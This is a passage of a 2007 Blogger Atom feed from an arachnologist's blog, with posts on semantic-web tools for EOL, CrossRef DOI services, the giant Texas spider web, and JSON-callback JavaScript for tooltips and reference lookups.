href="http://2.bp.blogspot.com/_VYUFlXOCOxE/RuhUONqXX7I/AAAAAAAAAEE/sw60wad_rXQ/s1600-h/MindRaider.png"&gt;&lt;img style="cursor:pointer; cursor:hand;float:left;padding-right:10px" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/RuhUONqXX7I/AAAAAAAAAEE/sw60wad_rXQ/s320/MindRaider.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5109426380414082994" /&gt;&lt;/a&gt;I envision WorkBench as a Semantic Web browser of sorts, capable of pulling dozens of data types from hundreds of sources into a drag-drop whiteboard something like a mindmap. Coincidentally, I stumbled across &lt;a href="http://mindraider.sourceforge.net/index.html"&gt;MindRaider&lt;/a&gt;. Though I'd much rather see a Flex-based solution (such that &lt;a href="http://labs.adobe.com/technologies/air/"&gt;Adobe AIR&lt;/a&gt; can be used), MindRaider (Java-based) developed by &lt;a href="http://www.e-mental.com/dvorka/"&gt;Martin Dvorak&lt;/a&gt; looks to be a very interesting way to organize concepts as interconnected resources and also permits a user to annotate components of the mindmap. Sharing such Semantic mindmaps is also a critical piece of the puzzle as is making interconnections to content in a user's local hard drive.&lt;br /&gt;&lt;br /&gt;What then do we need for EOL's WorkBench? 1) web services, 2) web services, and 3) web services, AND 4) commonly structured web services such that resources acquired from hundreds of data providers must not require customized connectors.&lt;br /&gt;&lt;br /&gt;Somehow, I'd like to see data providers ALL using OpenSearch (with MediaRSS or FOAF extensions) for fulltext, federated search and/or TAPIR for the eventual &lt;a href="http://wiki.tdwg.org/twiki/bin/view/SPM/WebHome"&gt;Species Profile Model&lt;/a&gt;'s structured mark-up. Then, I'd like to see RSSBus on EOL servers. Lastly, I'd like to see a melange of MindRaider, Mindomo, and a Drupal-like solution to permit self-organization of interest groups of the kind Vince Smith champions with &lt;a href="http://vsmith.info/scratchpads"&gt;Scratchpads&lt;/a&gt;. Vince and others no doubt argue that there is great value in centralized hosting. But, the advantage is 99% provider. End users don't give two hoots for this so long as the application is intuitively obvious and permits a certain degree of import, export, configuration and customization.&lt;br /&gt;&lt;br /&gt;So, the pieces of the puzzle:&lt;br /&gt;&lt;br /&gt;Providers -&gt; RSS -&gt; RSSBus -&gt; MindRaider/Mindomo/Scratchpad (in Adobe AIR) &lt;- local hard drive&lt;br /&gt;&lt;br /&gt;Sounds easy doesn't it? Yeah, right.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-4277474808172815954?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/4277474808172815954/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=4277474808172815954' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4277474808172815954'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4277474808172815954'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/09/eol-workbench-ideas-loosely-joined.html' title='EOL &quot;WorkBench&quot; Ideas Loosely Joined'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_VYUFlXOCOxE/RuhUONqXX7I/AAAAAAAAAEE/sw60wad_rXQ/s72-c/MindRaider.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-6855467859687071971</id><published>2007-09-07T22:00:00.000-06:00</published><updated>2007-11-16T10:12:51.110-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DOI'/><category scheme='http://www.blogger.com/atom/ns#' term='CrossRef'/><title type='text'>Forward Thinking</title><content type='html'>&lt;a href="http://1.bp.blogspot.com/_VYUFlXOCOxE/RuImSg5Kj1I/AAAAAAAAAD8/RNHzs4a1Xlo/s1600-h/editorial.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/RuImSg5Kj1I/AAAAAAAAAD8/RNHzs4a1Xlo/s320/editorial.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5107687026900766546" /&gt;&lt;/a&gt;&lt;br /&gt;I &lt;a href="http://ispiders.blogspot.com/2007/09/crossref-takes-step-back.html"&gt;previously criticized&lt;/a&gt; CrossRef for the implementation of new restrictive rules for use of its OpenURL service, but Ed Pentz, Executive Director of CrossRef, stopped by and reassured us that CrossRef exists to fill the gaps. The most restrictive rule has now been relaxed. Well done, Ed.&lt;br /&gt;&lt;br /&gt;While browsing around new publications in &lt;a href="http://www.springerlink.com/content/100125/"&gt;Biodiversity and Conservation&lt;/a&gt;, I caught something called "Referenced by" out of the corner of my eye. This may be old hat to most of you and I now feel ashamed that I have not yet discovered it. Perhaps I have subconsciously dismissed boxes on web sites because Google AdWare panels have constrained my eyeball movements. Anyhow, CrossRef have used the power of DOIs to provide a hyperlinked list of more recent publications that have referenced the work you are currently examining. Ed Pentz has &lt;a href="http://www.crossref.org/crweblog/2007/08/crossref_forward_linking_1.html"&gt;blogged about this new feature&lt;/a&gt;. Now, this is cool and is the stuff dreams are made of. For example, a paper by Matt Greenstone in '83 entitled, "Site-specificity and site tenacity in a wolf spider: A serological dietary analysis" (doi:&lt;a href="http://dx.doi.org/10.1007/BF00378220"&gt;10.1007/BF00378220&lt;/a&gt;) is referenced by at least 6 more recent works as exemplified in that panel including several by Matt himself. Besides the obvious way that this permits someone to peruse your life's work (provided you reference yourself and publish in journals that have bought into CrossRef), this is a slick way to keep abreast of current thinking. If your initial introduction to subject matter is via pre-1990 publications, you can quickly examine how and who has used previous works regardless of what journal that article has appeared. Hats off CrossRef!&lt;br /&gt;&lt;br /&gt;Now, what we need are publishing firms still mired in the dark ages to wake-up to the power of DOIs. If you participate in the editorial procedures for a scientific society and your publisher has not yet stepped-up by providing you with DOIs, get on the phone and jump all over them! You would be doing your readers, authors, and society a disservice if you accepted anything less than full and rapid cooperation by your chosen publisher.&lt;br /&gt;&lt;br /&gt;So Ed, will "Forward Linking" be a web service we can tap into?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-6855467859687071971?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/6855467859687071971/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=6855467859687071971' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6855467859687071971'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6855467859687071971'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/09/forward-thinking.html' title='Forward Thinking'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_VYUFlXOCOxE/RuImSg5Kj1I/AAAAAAAAAD8/RNHzs4a1Xlo/s72-c/editorial.jpg' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-1921499987971347681</id><published>2007-09-05T07:28:00.000-06:00</published><updated>2007-11-16T10:13:32.838-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DOI'/><category scheme='http://www.blogger.com/atom/ns#' term='CrossRef'/><title type='text'>CrossRef Takes a Step Back</title><content type='html'>&lt;div style="background-color:#f0ffff;width:400px;margin:0px auto"&gt;UPDATE Sept. 8/2007: Please read the response to this post by Edward Pentz, Executive Director of CrossRef in the comments below.&lt;/div&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_VYUFlXOCOxE/Rt6yxA5Kj0I/AAAAAAAAAD0/RDzI1MtBPB0/s1600-h/new-1.png"&gt;&lt;img style="margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/_VYUFlXOCOxE/Rt6yxA5Kj0I/AAAAAAAAAD0/RDzI1MtBPB0/s320/new-1.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5106715582607822658" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;Mission statement: "CrossRef is a not-for-profit membership association whose mission is to enable easy identification and use of trustworthy electronic content by promoting the cooperative development and application of a sustainable infrastructure."&lt;/blockquote&gt;&lt;br /&gt;Not-for-profilt, hunh? Money-grabbing in the professional publishing industry has once again proven to be more important than making scientific works readily accessible. As of September 7, 2007, CrossRef will roll out new rules for its OpenURL and DOI lookups. Unless you become a card carrying CrossRef "affiliate", there will be a daily cap of 100 lookups using their OpenURL service, which will require a username/password. If &gt;100 lookups are performed, CrossRef will reserve the right to cancel the account and will force you to buy into their senseless &lt;a href="http://www.crossref.org/04intermediaries/34affiliate_fees.html"&gt;pay-for-use system&lt;/a&gt;. Here are the new rules as described at &lt;a href="http://www.crossref.org/04intermediaries/60affiliate_rules.html"&gt;http://www.crossref.org/04intermediaries/60affiliate_rules.html&lt;/a&gt;:&lt;br /&gt;&lt;blockquote&gt;&lt;ol&gt;&lt;li&gt;Affiliates must sign and abide by the term of the CrossRef Affiliate Terms of Use&lt;/li&gt;&lt;li&gt;Affiliates must pay the fees listed in the CrossRef Schedule of Fees&lt;/li&gt;&lt;li&gt;The Annual Admininstrative Fee is based on the number of new records added to the Affiliates service(s) and/or product(s) available online&lt;/il&gt;&lt;li&gt;There are no per-DOI retrieval fees. There are no fees based on the number of links created with the Digital Identifiers.&lt;/li&gt;&lt;li&gt;Affiliates may "cache" retrieved DOIs (i.e. store them in their local systems)&lt;/li&gt;&lt;li&gt;The copyright owner of a journal has the sole authority to designate, or authorize an agent to designate, the depositor and resolution URL for articles that appear in that journal&lt;/li&gt;&lt;li&gt;A primary journal (whether it is hosted by the publisher or included in an aggregator or database service) must be deposited in the CrossRef system before a CrossRef Member or Affiliate can retrieve DOIs for references in that article. For example, an Affiliate that hosts full text articles can only lookup DOIs for references in an article if that journal's publisher is a PILA Member and is depositing metadata for that journal in the CrossRef System&lt;/li&gt;&lt;li&gt;Real-time DOI look-up by affiliates is not permitted (that is, submitting queries to retrieve DOIs on-the-fly, at the time a user clicks a link). The system is designed for DOIs to be retrieved in batch mode.&lt;/li&gt;&lt;/ol&gt;&lt;/blockquote&gt;&lt;br /&gt;So what's the big deal?&lt;br /&gt;The issue has to do with scientific society back-issues like the kind served by JStore. Without some sort of real-time DOI look-up, it is near impossible to learn of newly scanned and hosted PDF reprints for older works. After September 7, the only solution available to developers and bioinformaticians is to periodically "batch upload" lookups. CrossRef sees Rod Page's bioGUID service and my simple, &lt;a href="http://ispiders.blogspot.com/2007/08/gimme-that-scientific-paper-part-iii.html"&gt;real-time gadget&lt;/a&gt; as a threat to their steady flow of income even though it clearly fits within their general purpose "...to promote the development and cooperative use of new and innovative technologies to speed and facilitate scholarly research."&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-1921499987971347681?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/1921499987971347681/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=1921499987971347681' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1921499987971347681'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1921499987971347681'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/09/crossref-takes-step-back.html' title='CrossRef Takes a Step Back'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_VYUFlXOCOxE/Rt6yxA5Kj0I/AAAAAAAAAD0/RDzI1MtBPB0/s72-c/new-1.png' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-5812871391084603364</id><published>2007-09-01T17:36:00.000-06:00</published><updated>2007-10-25T13:36:17.961-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='spiders'/><title type='text'>Giant Texas Spider Web</title><content type='html'>This past week, there have been &lt;a href="http://www.cbc.ca/technology/story/2007/08/30/sci-web.html?ref=rss"&gt;numerous&lt;/a&gt; &lt;a href="http://www.cnn.com/2007/US/08/30/spider.web.ap/index.html"&gt;stories&lt;/a&gt; about the Giant Texas Spider Web in Lake Tawakoni State Park such as this compiled CNN video re-posted on YouTube:&lt;br /&gt;&lt;div align="center"&gt;&lt;object width="425" height="350" param name="movie" value="http://www.youtube.com/v/D5NXfmxh65M"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/D5NXfmxh65M" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;br&gt;&lt;br /&gt;&lt;iframe width="425" height="350" align="center" frameborder="no" scrolling="no" marginheight="0" marginwidth="0" src="http://maps.google.com/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;ll=32.840871,-95.991669&amp;spn=0.027331,0.057077&amp;om=1&amp;msid=116660870661584453925.0004391b7af9b56f7522a&amp;output=embed&amp;s=AARTsJpoqPIn08C8wSJnttY-PbouH8_cNQ"&gt;&lt;/iframe&gt;&lt;br/&gt;&lt;a href="http://maps.google.com/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;ll=32.840871,-95.991669&amp;spn=0.027331,0.057077&amp;om=1&amp;msid=116660870661584453925.0004391b7af9b56f7522a&amp;source=embed" style="color:#0000FF;text-align:left;font-size:small"&gt;View Larger Map&lt;/a&gt;&lt;br&gt;&lt;br /&gt;There hasn't yet been a definitive identification of the species involved (stay tuned for more), but from the videos I have seen, the primary culprit looks to be a tetragnathid (long-jawed orbweaver) and not the assumed social spiders like &lt;em&gt;Anelosimus&lt;/em&gt; spp. (doi:&lt;a href="http://dx.doi.org/10.1111/j.1096-3642.2006.00213.x"&gt;10.1111/j.1096-3642.2006.00213.x&lt;/a&gt;). This behaviour is rather unusual for a tetragnathid and reminds me of what was thought to be a mass dispersal event gone awry near McBride, British Columbia several years ago. In that case, the species involved were (in order of numerical dominance): &lt;a href="http://www.canadianarachnology.org/data/spiders/9962"&gt;&lt;em&gt;Collinsia ksenia&lt;/em&gt; (Crosby &amp; Bishop, 1928)&lt;/a&gt;, &lt;a href="http://www.canadianarachnology.org/data/spiders/10381"&gt;&lt;em&gt;Erigone aletris&lt;/em&gt; Crosby &amp; Bishop, 1928&lt;/a&gt;, a &lt;em&gt;Walckenaeria&lt;/em&gt; sp., and &lt;a href="http://www.canadianarachnology.org/data/spiders/15326"&gt;&lt;em&gt;Araniella displicata&lt;/em&gt; (Hentz, 1847)&lt;/a&gt;. See Robin Leech &lt;em&gt;et al.&lt;/em&gt;'s article in The Canadian Arachnologist (&lt;a href="http://www.canadianarachnology.org/newsletters/CA2003_Leech1.pdf"&gt;PDF&lt;/a&gt;, 180kb). In the case of this massive Texas webbing, there also appear to be several other species present in the vicinity as evidenced by the nice clip of &lt;a href="http://www.canadianarachnology.org/data/spiders/15350"&gt;&lt;em&gt;Argiope aurantia&lt;/em&gt; Lucas, 1833&lt;/a&gt; in the YouTube video above.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;br /&gt;Mike Quinn, who compiles "&lt;a href="http://www.texasento.net/"&gt;Texas Entomology&lt;/a&gt;", has a great page on the &lt;a href="http://www.texasento.net/Social_Spider.htm"&gt;possible identity&lt;/a&gt; of the species involved in the giant web. The candidate in the running now is &lt;a href="http://www.canadianarachnology.org/data/spiders/14193"&gt;&lt;em&gt;Tetragnatha guatamalensis&lt;/em&gt; O. P.-Cambridge, 1889&lt;/a&gt;, which has been collected from Wisconsin to Nova Scotia, south to Baja California, Florida, Panama, and the West Indies. The common habitat as is the case for most tetragnathids is on streamside or lakeside shrubs and tall herbs.&lt;br /&gt;&lt;div align="center"&gt;&lt;script type="text/javascript" src="http://www.canadianarachnology.org/linking/deeplinkjs.asp?species=14193&amp;amp;imagetype=habitus&amp;amp;title_color=%23CCFF33&amp;amp;w=435&amp;amp;h=363&amp;amp;s=no&amp;amp;border=ridge+2px+%23000000"&gt;&lt;br /&gt;&lt;/script&gt;&lt;/div&gt;&lt;br /&gt;Another potential candidate (if these are indeed tetragnathids) is &lt;a href="http://www.canadianarachnology.org/data/spiders/14148"&gt;&lt;em&gt;Tetragnatha elongata&lt;/em&gt; Walckenaer, 1842&lt;/a&gt;. I suspect the tetragnathids and &lt;em&gt;A. aurantia&lt;/em&gt; are incidentals and not the primary culprits who made the giant mess of webbing. Since Robb Bennett and Ingi Agnarsson both have suspicions that the architect is &lt;a href="http://www.canadianarachnology.org/data/spiders/6957"&gt;&lt;em&gt;Anelosimus studiosus&lt;/em&gt; (Hentz, 1850)&lt;/a&gt;, and since it is highly unlikely it is a tetragnathid, I have my bets on ergionine linyphiids much like what happened in McBride, BC.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-5812871391084603364?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/5812871391084603364/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=5812871391084603364' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5812871391084603364'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5812871391084603364'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/09/giant-texas-spider-web.html' title='Giant Texas Spider Web'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-8878359066787038160</id><published>2007-08-22T17:30:00.000-06:00</published><updated>2007-10-06T14:10:48.472-06:00</updated><title type='text'>JSON is Kewl</title><content type='html'>&lt;script type="text/javascript" src="http://www.canadianarachnology.org/bioGUID/tooltips/wz_tooltip.js"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="http://www.canadianarachnology.org/bioGUID/tooltips/tip_balloon.js"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="http://www.canadianarachnology.org/bioGUID/tooltips/tip_centerwindow.js"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="http://www.canadianarachnology.org/bioGUID/tooltips/tip_followscroll.js"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="http://www.canadianarachnology.org/bioGUID/jsonYahoo.js"&gt;&lt;/script&gt;&lt;br /&gt;While messing around with the new fangled &lt;a href="http://ispiders.blogspot.com/2007/08/gimme-that-scientific-paper-part-iii.html"&gt;reference parser&lt;/a&gt; script that connects to &lt;a href="http://bioGUID.info"&gt;bioGUID&lt;/a&gt; to get the goods, it occurred to me that this slick, simple technique that requires next to no mark-up, can be applied to all sorts of nifty things. Yahoo produces JSON for its search results and you can specify your own callback function. So, for kicks, I adjusted my JavaScript file a bit to use Yahoo instead of Rod Page's bioGUID reference parser and also added some cool &lt;a href="http://www.walterzorn.com/tooltip/tooltip_e.htm"&gt;DHTML tooltips&lt;/a&gt; developed by Walter Zorn. So, hover your mouse over a few animal and plant names that I list here with no particular relevance: &lt;span class="lifeform"&gt;&lt;i&gt;Latrodectus mactans&lt;/i&gt;&lt;/span&gt;, &lt;span class="lifeform"&gt;Blue Whale&lt;/span&gt;, &lt;span class="lifeform"&gt;blue fescue&lt;/span&gt;, and, Donald Hobern's favourite, &lt;span class="lifeform"&gt;&lt;i&gt;Puma concolor&lt;/i&gt;&lt;/span&gt;. Incidentally, I may as well try it with &lt;span class="lifeform"&gt;Donald Hobern&lt;/span&gt; himself (Disclaimer: I take no responsibility for what may pop-up in the tooltip). Now that I have been messing with this JavaScript for pulling JSON with a callback, this stuff is quite exciting. You have to remember that there is next to NO mark-up or any additional effort for someone to take advantage of this. I only have a few JavaScript files in the &amp;lt;body&amp;gt; section of this page and I mark-up the stuff I want to have a tooltip with &amp;lt;span class="lifeform"&amp;gt;name here&amp;lt;/span&amp;gt;. This is pretty cool if I do say so myself.&lt;br /&gt;I initially tried this technique with Flickr, but they don't permit square brackets in a callback function. So, I wrote the developers and alerted them to this cool new toy. Hopefully, they'll open the gates a little more and not be so restrictive.&lt;br /&gt;&lt;br /&gt;Forgive me...I just can't help myself:&lt;br /&gt;&lt;span class="lifeform"&gt;&lt;i&gt;Carabus nemoralis&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="lifeform"&gt;&lt;i&gt;Argiope aurantia&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="lifeform"&gt;&lt;i&gt;Culex quinquefasciatus&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="lifeform"&gt;duck-billed platypus&lt;/span&gt;&lt;br /&gt;&lt;span class="lifeform"&gt;slime mould&lt;/span&gt;&lt;br /&gt;...How many more million to go?...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-8878359066787038160?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/8878359066787038160/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=8878359066787038160' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8878359066787038160'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8878359066787038160'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/08/json-is-kewl.html' title='JSON is Kewl'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-6425471825609363392</id><published>2007-08-19T23:25:00.000-06:00</published><updated>2007-10-06T14:12:34.361-06:00</updated><title type='text'>Gimme That Scientific Paper Part III</title><content type='html'>&lt;script type="text/javascript" src="http://www.canadianarachnology.org/bioGUID/jsonbioGUID.js"&gt;&lt;/script&gt;&lt;br /&gt;&lt;div style="background:#f0fff0;border:1px #000 solid;padding:5px;width:400px;margin:0px auto"&gt;&lt;b&gt;Update Sep 28, 2007&lt;/b&gt;: Internet Explorer 6 &lt;a href="http://ispiders.blogspot.com/2007/09/ie6-is-crap-by-design.html"&gt;refuses to cache images properly&lt;/a&gt; so I have an alternate version of the script that disables the functionality described below for these users. You may see it in action &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/AllReferences.asp"&gt;HERE&lt;/a&gt;. Also, the use of spans (see below) may be too restrictive for you to implement so I developed a "spanless" version of the script &lt;a href="http://www.canadianarachnology.org/bioGUID/jsonbioGUIDv2.js"&gt;HERE&lt;/a&gt;. This version only requires the following mark-up for each cited reference and you can of course change a line in the script if you're not pleased with the class name and want to use something else:&lt;br&gt;&lt;span style="font-size:x-small"&gt;&amp;lt;p class="article"&amp;gt;Full reference and HTML formatting allowed&amp;lt;/p&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;Those who have followed along in this blog will recall that I dislike seeing references to scientific papers on web pages when there are no links to download the reprint. And, even when the page author makes a bit of effort, the links are often broken. One solution to this in the library community is to use COinS. But, this spec absolutely sucks for a page author because there is quite a bit of additional mark-up that has to be inserted in a very specific way. [Thankfully, there is at least one COinS generator you can use.] I was determined to find a better solution than this.&lt;br /&gt;You may also recall that I came up with an AJAX solution together with Rod Page. However, that solution used Flash as the XMLHTTP parser, which meant that a crossdomain.xml file had to be put on Rod's server, i.e. this really wasn't a cross-domain solution unless Rod were to open up his server to all domains. Yahoo does this, but it really wasn't practical for Rod. As a recap, this is what I did in earlier renditions:&lt;br /&gt;The JavaScript automatically read all the references on a page (as long as they were sequentially numbered), auto-magically added some little search icons such as &lt;img id="BLOGGER_PHOTO_ID_5100651715851095794" alt="" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/Rskntg5KjvI/AAAAAAAAADM/541IbU1x47E/s320/magnifier.png" border="0" height="16px" width="16px" style="border:0px; margin:0px;padding:0px" /&gt;, &amp; when clicking these, the references were searched via Rod Page's &lt;a href="http://bioguid.info/"&gt;bioGUID&lt;/a&gt; reference parsing service. If a DOI or a handle was found, the icon changed to &lt;img id="BLOGGER_PHOTO_ID_5100652063743446786" alt="" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/RskoBw5KjwI/AAAAAAAAADU/h9HH6sXb1as/s320/world_go.png" border="0" height="16px" width="16px" style="border:0px; margin:0px;padding:0px" /&gt; ; if a PDF was found, the icon changed to &lt;img id="BLOGGER_PHOTO_ID_5100652480355274514" alt="" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/RskoaA5KjxI/AAAAAAAAADc/Gvqyera_UOk/s320/page_white_acrobat.png" border="0" height="16px" width="16px" style="border:0px; margin:0px;padding:0px" /&gt;; if neither a PDF or a link via DOI or handle were found, the icon changed to &lt;img id="BLOGGER_PHOTO_ID_5100652531894882082" alt="" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/RskodA5KjyI/AAAAAAAAADk/5maV9CunPEc/s320/g_scholar.png" border="0" height="16px" width="16px" style="border:0px; margin:0px;padding:0px" /&gt; whereby you could search for the title on Google Scholar; and finally, if the reference was not successfully parsed in bioGUID, then the icon changed to an "un"-clickable &lt;img id="BLOGGER_PHOTO_ID_5100652600614358834" alt="" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/RskohA5KjzI/AAAAAAAAADs/Z8y0naM7gOU/s320/delete.png" border="0" height="16px" width="16px" style="border:0px; margin:0px;padding:0px" /&gt;. If you wanted to take advantage of this new toy on your web pages, you had to either contact Rod and ask that your domain be added to his crossdomain.xml file or you'd have to set-up a PHP/ASP/etc. proxy. But, Rod has now been very generous...&lt;br /&gt;&lt;br /&gt;Rod now spits out JSON with a callback function. What this means is that there are no longer any problems with cross-domain issues as is typically the case with XMLHTTP programming. To make a long story short, if you are a web page author and include a number of scientific references on your page(s), all you need do is grab the JavaScript file &lt;a href="http://www.canadianarachnology.org/bioGUID/jsonbioGUID.js"&gt;HERE&lt;/a&gt;, grab the images above, adjust the contents of the JavaScript to point to your images, then wrap up each of your references in span elements as follows:&lt;br /&gt;&lt;br /&gt;&amp;lt;p&amp;gt;&amp;lt;span class="article"&amp;gt;This is one full reference.&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;&amp;lt;p&amp;gt;&amp;lt;span class="article"&amp;gt;This is another reference.&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;etc.&lt;br /&gt;How easy is that?!&lt;br /&gt;To see this in action, have a peek at the &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/AllReferences.asp"&gt;references section&lt;/a&gt; of The Nearctic Spider Database.&lt;br /&gt;&lt;br /&gt;Or, you can try it yourself here:&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;span class="article"&gt;Buckle, D. J. 1973. A new Philodromus (Araneae: Thomisidae) from Arizona. &lt;em&gt;J. Arachnol.&lt;/em&gt; &lt;strong&gt;1:&lt;/strong&gt; 142-143.&lt;/span&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;For the mildly curious and for those who have played with JSON outputs with a callback function, I ran into a snag that caused no end of grief. When one appends a JSON callback to a page header, a function call is dynamically inserted. This works great when there is only need for one instance of that function at a time. However, in this case, a user may want to call several searches in rapid succession before any previous call was finished. As a consequence, the appended callback functions may pile up on each other and steal each others' scope. The solution was to dump the callback functions into an array, which was mighty tricky to handle.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-6425471825609363392?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' 